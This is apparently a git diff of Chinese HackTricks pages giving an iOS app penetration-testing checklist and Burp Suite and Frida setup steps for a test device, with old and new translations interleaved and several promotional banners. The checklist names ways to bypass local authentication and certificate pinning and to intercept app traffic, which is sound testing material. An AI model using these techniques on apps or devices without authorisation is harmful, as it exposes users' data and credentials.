使用 [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) 来轻松构建和自动化由全球**最先进**的社区工具提供支持的工作流程。\
使用 [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
{% hint style="success" %}
学习和实践 AWS Hacking<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP Hacking <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family) 收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
**Try Hard Security Group**
@ -32,90 +33,91 @@
### 准备工作
* [ ] 阅读 [**iOS 基础知识**](ios-pentesting/ios-basics.md)
* [ ] 阅读 [**iOS 测试环境**](ios-pentesting/ios-testing-environment.md) 以准备您的环境
* [ ] 阅读 [**iOS 初始分析**](ios-pentesting/#initial-analysis) 的所有部分,了解渗透测试 iOS 应用程序的常见操作
* [ ] 阅读 [**iOS 基础**](ios-pentesting/ios-basics.md)
* [ ] 阅读 [**iOS 测试环境**](ios-pentesting/ios-testing-environment.md) 准备你的环境
* [ ] 阅读 [**iOS 初步分析**](ios-pentesting/#initial-analysis) 的所有部分,以了解对 iOS 应用程序进行渗透测试的常见操作
### 数据存储
* [ ] [**Plist 文件**](ios-pentesting/#plist) 可用于存储敏感信息。
* [ ] [**Core Data**](ios-pentesting/#core-data)SQLite 数据库)可存储敏感信息。
* [ ] [**YapDatabases**](ios-pentesting/#yapdatabase)SQLite 数据库)可存储敏感信息。
* [ ] [**Core Data**](ios-pentesting/#core-data)SQLite 数据库)可存储敏感信息。
* [ ] [**YapDatabases**](ios-pentesting/#yapdatabase)SQLite 数据库)可存储敏感信息。
* [ ] [**Firebase**](ios-pentesting/#firebase-real-time-databases) 配置错误。
* [ ] [**Realm 数据库**](ios-pentesting/#realm-databases) 可存储敏感信息。
* [ ] [**Couchbase Lite 数据库**](ios-pentesting/#couchbase-lite-databases) 可存储敏感信息。
* [ ] [**二进制 cookies**](ios-pentesting/#cookies) 可存储敏感信息
* [ ] [**缓存数据**](ios-pentesting/#cache) 可存储敏感信息
* [ ] [**自动快照**](ios-pentesting/#snapshots) 可保存视觉敏感信息
* [ ] [**钥匙串**](ios-pentesting/#keychain) 通常用于存储可能在转售手机时留下的敏感信息
* [ ] 简而言之,只需**检查应用程序在文件系统中保存的敏感信息**
* [ ] [**Realm 数据库**](ios-pentesting/#realm-databases)可存储敏感信息。
* [ ] [**Couchbase Lite 数据库**](ios-pentesting/#couchbase-lite-databases)可存储敏感信息。
* [ ] [**二进制 Cookie**](ios-pentesting/#cookies)可以存储敏感信息
* [ ] [**缓存数据**](ios-pentesting/#cache)可存储敏感信息
* [ ] [**自动快照**](ios-pentesting/#snapshots)可保存视觉敏感信息
* [ ] [**钥匙串**](ios-pentesting/#keychain) 通常用于存储敏感信息,可能在转售手机时被遗留。
* [ ] 总之,只需 **检查应用程序在文件系统中保存的敏感信息**
### 键盘
* [ ] 应用程序是否**允许使用自定义键盘**
* [ ] 检查敏感信息是否保存在[**键盘缓存文件**](ios-pentesting/#custom-keyboards-keyboard-cache)中
* [ ] 应用程序是否 [**允许使用自定义键盘**](ios-pentesting/#custom-keyboards-keyboard-cache)?
* [ ] 检查是否在 [**键盘缓存文件**](ios-pentesting/#custom-keyboards-keyboard-cache) 保存了敏感信息
### **日志**
* [ ] 检查是否正在记录[**敏感信息**](ios-pentesting/#logs)
* [ ] 检查是否 [**记录了敏感信息**](ios-pentesting/#logs)
### 备份
* [ ] [**备份**](ios-pentesting/#backups) 可用于访问文件系统中保存的敏感信息(检查此清单的初始点)
* [ ] 此外,[**备份**](ios-pentesting/#backups) 可用于**修改应用程序的某些配置**,然后在手机上**恢复**备份,一旦**加载**修改后的配置,可能会**绕过**某些(安全)**功能**
* [ ] [**备份**](ios-pentesting/#backups) 可用于 **访问文件系统中保存的敏感信息**(检查此检查表的初始点)
* [ ] 此外,[**备份**](ios-pentesting/#backups) 可用于 **修改应用程序的一些配置**,然后 **在手机上恢复** 备份,作为 **修改后的配置****加载**,某些(安全) **功能** 可能会被 **绕过**
### **应用程序内存**
* [ ] 检查[**应用程序内存**](ios-pentesting/#testing-memory-for-sensitive-data)中是否有敏感信息
* [ ] 检查 [**应用程序内存**](ios-pentesting/#testing-memory-for-sensitive-data) 中的敏感信息
### **破加密**
### **破损的加密**
* [ ] 检查是否可以找到用于加密的[**密码**](ios-pentesting/#broken-cryptography)
* [ ] 检查是否使用了[**已弃用/弱算法**](ios-pentesting/#broken-cryptography)来发送/存储敏感数据
* [ ] [**挂钩和监视加密函数**](ios-pentesting/#broken-cryptography)
* [ ] 检查是否可以找到 [**用于加密的密码**](ios-pentesting/#broken-cryptography)
* [ ] 检查是否使用 [**过时/弱算法**](ios-pentesting/#broken-cryptography) 来发送/存储敏感数据
* [ ] [**钩取并监控加密函数**](ios-pentesting/#broken-cryptography)
### **本地身份验证**
* [ ] 如果应用程序使用了[**本地身份验证**](ios-pentesting/#local-authentication),应检查身份验证的工作方式。
* [ ] 如果使用了[**本地身份验证框架**](ios-pentesting/#local-authentication-framework)可能很容易被绕过
* [ ] 如果使用了可以**动态绕过**的[**函数**](ios-pentesting/#local-authentication-using-keychain),可以创建自定义的 frida 脚本
* [ ] 如果应用程序使用了 [**本地身份验证**](ios-pentesting/#local-authentication)检查身份验证的工作方式。
* [ ] 如果使用的是 [**本地身份验证框架**](ios-pentesting/#local-authentication-framework),则可能很容易被绕过
* [ ] 如果使用的是 [**可以动态绕过的函数**](ios-pentesting/#local-authentication-using-keychain)可以创建一个自定义的 frida 脚本
### 通过 IPC 暴露敏感功能
* [**自定义 URI 处理程序 / 深度链接 / 自定义方案**](ios-pentesting/#custom-uri-handlers-deeplinks-custom-schemes)
* [ ] 检查应用程序是否**注册了任何协议/方案**
* [ ] 检查应用程序是否**注册使用**任何协议/方案
* [ ] 检查应用程序是否**期望接收来自自定义方案的任何敏感信息**可以被注册相同方案的另一个应用程序**拦截**
* [ ] 检查应用程序是否**未检查和清理**通过自定义方案输入的用户输入,某些**漏洞可能被利用**
* [ ] 检查应用程序是否**暴露任何敏感操作**,可以通过自定义方案从任何地方调用
* [ ] 检查应用程序是否 **注册了任何协议/方案**
* [ ] 检查应用程序是否 **注册使用** 任何协议/方案
* [ ] 检查应用程序 **是否期望从自定义方案接收任何类型的敏感信息**,该信息可以被注册相同方案的另一个应用程序 **拦截**
* [ ] 检查应用程序 **是否未检查和清理** 通过自定义方案的用户输入,某些 **漏洞可能被利用**
* [ ] 检查应用程序 **是否暴露任何敏感操作**,可以通过自定义方案从任何地方调用
* [**通用链接**](ios-pentesting/#universal-links)
* [ ] 检查应用程序是否**注册了任何通用协议/方案**
* [ ] 检查应用程序是否 **注册了任何通用协议/方案**
* [ ] 检查 `apple-app-site-association` 文件
* [ ] 检查应用程序是否**未检查和清理**通过自定义方案输入的用户输入,某些**漏洞可能被利用**
* [ ] 检查应用程序是否**暴露任何敏感操作**,可以通过自定义方案从任何地方调用
* [ ] 检查应用程序 **是否未检查和清理** 通过自定义方案的用户输入,某些 **漏洞可能被利用**
* [ ] 检查应用程序 **是否暴露任何敏感操作**,可以通过自定义方案从任何地方调用
* [**UIActivity 共享**](ios-pentesting/ios-uiactivity-sharing.md)
* [ ] 检查应用程序是否可以接收 UIActivities并且是否可以利用特制活动来利用任何漏洞
* [ ] 检查应用程序是否可以接收 UIActivities是否可以利用任何特殊构造的活动中的漏洞
* [**UIPasteboard**](ios-pentesting/ios-uipasteboard.md)
* [ ] 检查应用程序是否**将任何内容复制到通用剪贴板**
* [ ] 检查应用程序是否**使用通用剪贴板中的数据**
* [ ] 监视剪贴板,查看是否复制了任何**敏感数据**
* [**应用程序扩展**](ios-pentesting/ios-app-extensions.md)
* [ ] 应用程序是否**使用任何扩展**
* [ ] 检查应用程序是否 **将任何内容复制到通用剪贴板**
* [ ] 检查应用程序是否 **使用通用剪贴板中的数据**
* [ ] 监控剪贴板以查看是否有任何 **敏感数据被复制**
* [**应用扩展**](ios-pentesting/ios-app-extensions.md)
* [ ] 应用程序是否 **使用任何扩展**
* [**WebViews**](ios-pentesting/ios-webviews.md)
* [ ] 检查正在使用的 webview 种类
* [ ] 检查使用了哪种类型的 webviews
* [ ] 检查 **`javaScriptEnabled`**、**`JavaScriptCanOpenWindowsAutomatically`**、**`hasOnlySecureContent`** 的状态
* [ ] 检查 webview 是否可以使用协议 **file://** 访问本地文件 **(**`allowFileAccessFromFileURLs`、`allowUniversalAccessFromFileURLs`)
* [ ] 检查 JavaScript 是否可以访问**本地** **方法**`JSContext`、`postMessage`
* [ ] 检查 webview 是否可以 **访问本地文件**,协议为 **file://** **`allowFileAccessFromFileURLs``allowUniversalAccessFromFileURLs`**
* [ ] 检查 Javascript 是否可以访问 **Native** **方法**`JSContext``postMessage`
### 网络通信
* [ ] 执行**中间人攻击**到通信并搜索Web漏洞。
* [ ] 检查证书的**主机名**是否被检查
* [ ] 检查/绕过**证书固定**
* [ ] 执行 [**MitM 通信**](ios-pentesting/#network-communication) 并搜索网络漏洞。
* [ ] 检查 [**证书的主机名**](ios-pentesting/#hostname-check) 是否被检查
* [ ] 检查/绕过 [**证书钉扎**](ios-pentesting/#certificate-pinning)
### **其他**
* [ ] 检查是否存在**自动修补/更新**机制
* [ ] 检查是否存在**恶意第三方库**
* [ ] 检查 [**自动修补/更新**](ios-pentesting/#hot-patching-enforced-updateing) 机制
* [ ] 检查 [**恶意第三方库**](ios-pentesting/#third-parties)
**Try Hard Security Group**
@ -123,24 +125,25 @@
{% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
学习和实践 AWS Hacking<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP Hacking <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式:
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用[**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks)轻松构建和**自动化工作流程**,由全球**最先进**的社区工具驱动。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
立即获取访问权限
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

573
mobile-pentesting/ios-pentesting/README.md
View file

File diff suppressed because it is too large Load diff

108
mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md
View file

@ -1,126 +1,130 @@
# iOS Burp Suite配置
# iOS Burp Suite 配置
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
- 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs收藏品](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
{% endhint %}
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用[**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=burp-configuration-for-ios)可以轻松构建和**自动化工作流程**,使用世界上**最先进**的社区工具。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=burp-configuration-for-ios) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
今天就获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=burp-configuration-for-ios" %}
## 在iOS设备上安装Burp证书
## 在 iOS 设备上安装 Burp 证书
为了进行安全的Web流量分析和iOS设备上的SSL绑定可以通过**Burp Mobile Assistant**或手动配置来利用Burp Suite。以下是两种方法的摘要指南:
为了对 iOS 设备上的安全网络流量进行分析和 SSL 钉扎,可以通过 **Burp Mobile Assistant** 或手动配置来使用 Burp Suite。以下是两种方法的简要指南:
### 使用Burp Mobile Assistant进行自动安装
### 使用 Burp Mobile Assistant 自动安装
**Burp Mobile Assistant**简化了Burp证书的安装过程、代理配置和SSL Pinning。详细指导可在[PortSwigger的官方文档](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing)中找到。
**Burp Mobile Assistant** 简化了 Burp 证书、代理配置和 SSL 钉扎的安装过程。详细指导可以在 [PortSwigger 的官方文档](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing) 中找到。
### 手动安装步骤
1. **代理配置:** 首先在iPhone的Wi-Fi设置中将Burp设置为代理。
2. **证书下载:** 在设备的浏览器中导航`http://burp`下载证书。
3. **证书安装:** 通过**设置** > **通用** > **VPN和设备管理**安装下载的配置文件,然后在**证书信任设置**下启用对PortSwigger CA的信任。
1. **代理配置:** 首先在 iPhone Wi-Fi 设置中将 Burp 设置为代理。
2. **证书下载:** 在设备的浏览器中导航`http://burp` 下载证书。
3. **证书安装:** 通过 **设置** > **通用** > **VPN 与设备管理** 安装下载的配置文件,然后在 **证书信任设置** 中启用对 PortSwigger CA 的信任。
### 配置拦截代理
该设置使iOS设备与互联网之间的流量分析通过Burp进行需要支持客户端到客户端流量的Wi-Fi网络。如果不可用可以通过usbmuxd的USB连接作为替代方法。PortSwigger的教程提供了关于[设备配置](https://support.portswigger.net/customer/portal/articles/1841108-configuring-an-ios-device-to-work-with-burp)和[证书安装](https://support.portswigger.net/customer/portal/articles/1841109-installing-burp-s-ca-certificate-in-an-ios-device)的详细说明。
该设置允许通过 Burp 分析 iOS 设备与互联网之间的流量,需要支持客户端到客户端流量的 Wi-Fi 网络。如果不可用,可以通过 usbmuxd 进行 USB 连接作为替代。PortSwigger 的教程提供了关于 [设备配置](https://support.portswigger.net/customer/portal/articles/1841108-configuring-an-ios-device-to-work-with-burp) [证书安装](https://support.portswigger.net/customer/portal/articles/1841109-installing-burp-s-ca-certificate-in-an-ios-device) 的详细说明。
### 针对越狱设备的高级配置
对于越狱设备的用户通过USB上的SSH(通过**iproxy**提供了一种直接通过Burp路由流量的方法
对于越狱设备的用户,SSH 通过 USB通过 **iproxy**)提供了一种直接通过 Burp 路由流量的方法:
1. **建立SSH连接** 使用iproxy将SSH转发到本地主机允许iOS设备连接到运行Burp的计算机。
1. **建立 SSH 连接:** 使用 iproxy SSH 转发到本地主机,允许 iOS 设备连接到运行 Burp 的计算机。
```bash
iproxy 2222 22
```
2. **远程端口转发:**iOS设备的端口8080转发到计算机的localhost以便直接访问Burp的界面。
2. **远程端口转发:** iOS 设备的 8080 端口转发到计算机的本地主机,以便直接访问 Burp 的界面。
```bash
ssh -R 8080:localhost:8080 root@localhost -p 2222
```
3. **全局代理设置:** 最后,配置iOS设备的Wi-Fi设置使用手动代理将所有Web流量引导通过Burp。
3. **全局代理设置:** 最后,配置 iOS 设备的 Wi-Fi 设置以使用手动代理,将所有网络流量通过 Burp。
### 完整网络监控/嗅探
### 完整网络监控/嗅探
可以使用**Wireshark**高效地监控非HTTP设备流量这是一种能够捕获所有形式数据流量的工具。对于iOS设备通过创建远程虚拟接口实现实时流量监控这个过程在[这篇Stack Overflow帖子](https://stackoverflow.com/questions/9555403/capturing-mobile-phone-traffic-on-wireshark/33175819#33175819)中有详细说明。在开始之前需要在macOS系统上安装**Wireshark**。
可以使用 **Wireshark** 有效监控非 HTTP 设备流量,该工具能够捕获所有形式的数据流量。对于 iOS 设备,通过创建远程虚拟接口来实现实时流量监控,具体过程详见 [这篇 Stack Overflow 帖子](https://stackoverflow.com/questions/9555403/capturing-mobile-phone-traffic-on-wireshark/33175819#33175819)。在开始之前,需要在 macOS 系统上安装 **Wireshark**
该过程涉及几个关键步骤:
1. 通过USB在iOS设备和macOS主机之间建立连接。
2. 确定iOS设备的**UDID**,这是进行流量监控的必要步骤。可以通过在macOS终端中执行命令来完成
1. 通过 USB iOS 设备和 macOS 主机之间建立连接。
2. 确定 iOS 设备的 **UDID**,这是流量监控的必要步骤。可以通过在 macOS 终端中执行命令来完成:
```bash
$ rvictl -s <UDID>
Starting device <UDID> [SUCCEEDED] with interface rvi0
```
3. 在识别到UDID后应打开**Wireshark**并选择“rvi0”接口进行数据捕获。
4. 对于目标监控例如捕获与特定IP地址相关的HTTP流量可以使用Wireshark的捕获过滤器:
3. 在识别 UDID 后,**Wireshark** 应该被打开,并选择 "rvi0" 接口进行数据捕获。
4. 对于有针对性的监控,例如捕获与特定 IP 地址相关的 HTTP 流量,可以使用 Wireshark 的捕获过滤器:
## 在模拟器中安装Burp证书
## 在模拟器中安装 Burp 证书
* **导出Burp证书**
* **导出 Burp 证书**
在_Proxy_ --> _Options_ --> _Export CA certificate_ --> _Certificate in DER format_
_Proxy_ --> _Options_ --> _Export CA certificate_ --> _Certificate in DER format_
![](<../../.gitbook/assets/image (534).png>)
* **拖放**证书到模拟器中
* **在模拟器中**转到_Settings_ --> _General_ --> _Profile_ --> _PortSwigger CA_,并**验证证书**
* **在模拟器中**转到_Settings_ --> _General_ --> _About_ --> _Certificate Trust Settings_,并**启用PortSwigger CA**
* **在模拟器中**进入 _Settings_ --> _General_ --> _Profile_ --> _PortSwigger CA_,并 **验证证书**
* **在模拟器中**进入 _Settings_ --> _General_ --> _About_ --> _Certificate Trust Settings_,并 **启用 PortSwigger CA**
![](<../../.gitbook/assets/image (1048).png>)
**恭喜,您已成功在iOS模拟器中配置了Burp CA证书**
**恭喜,您已成功在 iOS 模拟器中配置 Burp CA 证书**
{% hint style="info" %}
**iOS模拟器将使用MacOS的代理配置。**
**iOS 模拟器将使用 MacOS 的代理配置。**
{% endhint %}
### MacOS代理配置
### MacOS 代理配置
配置Burp作为代理的步骤
配置 Burp 作为代理的步骤:
* 转到_System Preferences_ --> _Network_ --> _Advanced_
* 在_Proxies_选项卡中标记_Web Proxy (HTTP)_和_Secure Web Proxy (HTTPS)_
* 在两个选项中配置_127.0.0.1:8080_
* 进入 _System Preferences_ --> _Network_ --> _Advanced_
* 在 _Proxies_ 标签中标记 _Web Proxy (HTTP)__Secure Web Proxy (HTTPS)_
* 在两个选项中配置 _127.0.0.1:8080_
![](<../../.gitbook/assets/image (431).png>)
* 点击_**Ok**_然后点击_**Apply**_
* 点击 _**Ok**_ 然后在 _**Apply**_
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用[**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=burp-configuration-for-ios)轻松构建和**自动化工作流**,使用全球**最先进**的社区工具。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=burp-configuration-for-ios) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
今天就获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=burp-configuration-for-ios" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
</details>
{% endhint %}

138
mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md
View file

@ -1,26 +1,27 @@
# iOS Frida配置
# iOS Frida 配置
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
### [WhiteIntel](https://whiteintel.io)
<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否被 **窃取恶意软件** **入侵**
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel 的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
@ -28,38 +29,38 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
***
## 安装Frida
## 安装 Frida
**在越狱设备上安装Frida的步骤**
**在越狱设备上安装 Frida 的步骤:**
1. 打开Cydia/Sileo应用。
2. 转到管理 -> 源 -> 编辑 -> 添加。
3. 输入"https://build.frida.re"作为URL。
